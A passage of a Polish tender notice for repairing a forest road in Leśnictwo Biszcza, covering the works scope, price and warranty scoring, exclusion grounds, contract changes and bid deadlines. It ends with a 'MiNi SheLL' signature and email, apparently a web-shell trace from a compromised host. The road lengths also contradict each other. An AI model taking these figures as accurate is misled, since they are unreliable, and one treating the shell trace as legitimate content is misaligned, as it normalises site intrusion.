class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okre gwarancji i rekojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3(Zadanie 3) „Remont drogi leśnej numer inwentarzowy B59/54 w oddziałach 114, 115, 116,oraz 117 na odcinku długości 625 mb. w Leśnictwie BISZCZA”.<br/>Planowana do remontu droga leśna długości 215,00 m zlokalizowana jest w oddziałach Nr 114, 115, 116, oraz 117 w leśnictwie Biszcza. Początek drogi zlokalizowany jest na granicy pasa drogowego drogi powiatowej Nr 2936L. Natomiast koniec drogi zlokalizowany jest na granicy pasa drogowego drogi powiatowej Nr 2932L.<br/>Na całym odcinku drogi zaplanowano do remontu 3 miejsca o łącznej długości 625 m. Długości poszczególnych miejsc (odcinków robót) są zróżnicowane i wynoszą: 95,00 m, 110,00 m, oraz 625,00 m.<br/>Zaplanowana do remontu droga leśna w parametrach drogi klasy D posiada koronę szerokości 5,00 m ze spadkiem daszkowym jezdni 2 %, oraz spadkiem jednostronnym poboczy 8 %. Szerokość jezdni wynosi 3,50 m, a poboczy gruntowych 2 x 0,75 m.<br/>Parametry drogi leśnej oraz planowany zakres rzeczowy remontu<br/>- długość drogi do remontu (łącznie) – 625,00 m<br/>- szerokość jezdni – 3,50 m<br/>- wykonanie podbudowy z kruszywa łamanego grubości 20 cm – 2187,50 m2<br/>- wyrównanie podłoża i zaniżeń korony drogi wraz z wykonaniem koryta - nasyp z gruntu piaszczystego niewysadzinowego – 365,63 m3<br/>- regulacja poboczy - nasyp z gruntu j.w. – 293,75 m3<br/>- plantowanie nasypów – 1162,50 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert dla danej części zamówienia i wyborze najkorzystniejszej oferty zamawiający będzie kierował się kryteriami, których znaczenie (wagę) określa się punktowo tj. a)cena = 60 pkt b)okres gwarancji i rękojmi = 40 pkt<br/>15.2.Kryterium „Cena ” - „C” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia złożonej przez Wykonawcę w formularzu oferty dla danej części zamówienia. W tym kryterium można uzyskać maksymalnie 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.Ilość punktów w kryterium „cena” będzie wyliczana według następującego wzoru: C = C. of. min x 60 pkt / C. of. bad<br/>gdzie:<br/> C - ilość punktów, jakie otrzyma oferta "X” za kryterium “Cena”;<br/> C of. min. - najniższa cena spośród ofert nie podlegających odrzuceniu i <br/> złożonych przez wykonawców, którzy nie podlegali wykluczeniu w <br/> danym etapie badania i oceny ofert;<br/> C of. bad. - cena oferty badanej <br/>Opis kryterium ” okres gwarancji i rękojmi G.<br/> Kryterium będzie rozpatrywany na podstawie długości okresu gwarancji i rękojmi zadeklarowanej przez wykonawcę w ofercie.<br/> Minimalny okres gwarancji i rękojmi wymagany i podlegający ocenie przez <br/> zamawiającego: 3 lata. <br/> Maksymalny okres gwarancji i rękojmi wymagany i podlegający ocenie przez <br/> zamawiającego: 5 lat. <br/> Punktacja:<br/> Wykonawca, który zaoferuje okres gwarancji i rękojmi na okres 3 lat — otrzymuje 10pkt,<br/> Wykonawca, który zaoferuje okres gwarancji i rękojmi na okres 4 lat - otrzymuje 20pkt,<br/> Wykonawca, który zaoferuje okres gwarancji i rękojmi na okres 5 lat - otrzymuje 40pkt,<br/> W tym kryterium można uzyskać maksymalnie 40 punktów.<br/>15.4.Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę <br/> punktów (P) wyliczoną zgodnie z poniższym wzorem:<br/> P = C + G gdzie:<br/> P - łączna liczba punktów oferty ocenianej,<br/> C - liczba punktów uzyskanych w kryterium „Cena”,<br/> G - liczba punktów uzyskanych w kryterium „długość okresu gwarancji i <br/> rękojmi”.<br/> Zamawiający przyzna punkty maksymalnie za 5 lat, dalsze wydłużanie okresu <br/> gwarancji nie będzie miało wpływu na ocenę ofert.<br/> Wykonawca, który nie zadeklaruje / nie zaznaczy na formularzu oferty/ wydłużonego okresu obowiązywania gwarancji, w tym kryterium otrzyma 0 pkt. W takim przypadku, okres gwarancji będzie wynosił 2 lata.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okre gwarancji i rekojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na potwierdzenie braku podstaw do wykluczenia z udziału w postępowaniu <br/> Zamawiający wymaga złożenia:<br/> - odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu (odpowiednio: wykonawcy lub podmiotu udostępniającego zasoby) jest umocowana do jego reprezentowania;wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał w załączniku nr 1 do SWZ (Formularz oferty) dane umożliwiające dostęp do tych dokumentów. - oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o <br/> którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z <br/> postępowania określonych w: <br/> a) art. 108 ust. 1 pkt 3 PZP,<br/> b) art. 108 ust. 1 pkt 4 PZP dotyczących orzeczenia zakazu ubiegania się o <br/> zamówienie publiczne tytułem środka zapobiegawczego,<br/> c) art. 108 ust. 1 pkt 5 PZP dotyczących zawarcia z innymi wykonawcami <br/> porozumienia mającego na celu zakłócenie konkurencji, <br/> d) art. 108 ust. 1 pkt 6 PZP, <br/> - (wzór oświadczenia Wykonawcy o aktualności informacji zawartych w <br/> oświadczeniu, o którym mowa w art. 125 ust. 1 PZP w zakresie podstaw <br/> wykluczenia z postępowania stanowi załącznik nr 2 do SWZ).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Oprócz przypadków, o których mowa w art. 454 i 455 ustawy - Prawo zamówień publicznych, strony dopuszczają możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia którejkolwiek z następujących okoliczności: 1)przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej, 2)przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku skierowania przez Zamawiającego do Wykonawcy pisemnego żądania wstrzymania robót budowlanych, stanowiących przedmiot zamówienia lub wydania zakazu prowadzenia robót budowlanych, stanowiących przedmiot zamówienia przez organ administracji publicznej lub eksploatorów infrastruktury, o ile żądanie lub wydanie zakazu nie nastąpiło z czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi na jaki Wykonawcy nakazano wstrzymanie robót budowlanych lub zakazano prowadzenie robót budowlanych 3)przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić <br/>w przypadku wystąpienia kolizji z instalacjami wewnętrznymi nieujawnionymi lub innymi robotami prowadzonymi przez innego wykonawcę, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną Wykonawcy na usunięcie kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej lub o liczbę dni niezbędnych do wykonania robót przez innego wykonawcę - o ile usunięcie kolizji wymagać będzie przedłużenia terminu realizacji; 4)przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia konieczności wprowadzenia zmian, powodujących wstrzymanie lub przerwanie robót budowlanych, stanowiących przedmiot zamówienia, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do wprowadzenia zmian oraz do przeprowadzenia uzgodnień (ustaleń) z właściwymi organami, uzyskania opinii właściwych organów oraz wydania decyzji przez właściwe <br/>organy, przy czym wprowadzenie zmian nie może skutkować zwiększeniem (zmianą) zakresu świadczenia Wykonawcy zawartego w ofercie, stanowiącej załącznik nr 3 do umowy oraz zwiększeniem wynagrodzenia Wykonawcy, o którym mowa w § 3 ust. 1, 5)przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia warunków geologicznych lub hydrologicznych odmiennych od założonych i powodujących konieczność wstrzymania robót lub konieczność ich wykonania przy wykorzystaniu odmiennych od zaprojektowanych rozwiązań technicznych, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do wyeliminowania utrudnień związanych z ich wystąpieniem, 6)przedłużenia terminu wykonania zamówienia w zakresie niezbędnym do wykonania robót zleconych na podstawie art. 455 ust. 1 pkt 1, 3, 4 lub ust. 2 ustawy Prawo <br/>zamówień publicznych, 7)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy, ;Pozostałe zapisy projektowanych zmian umowy zawarte są w załączniku do SWZ - Projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem portalu https://platformazakupowa.pl/pn/lasy_bilgoraj . Na wymienionym portalu mozna również złozyć ,zmianę oraz wycofać oferty lub wnioski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-14 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com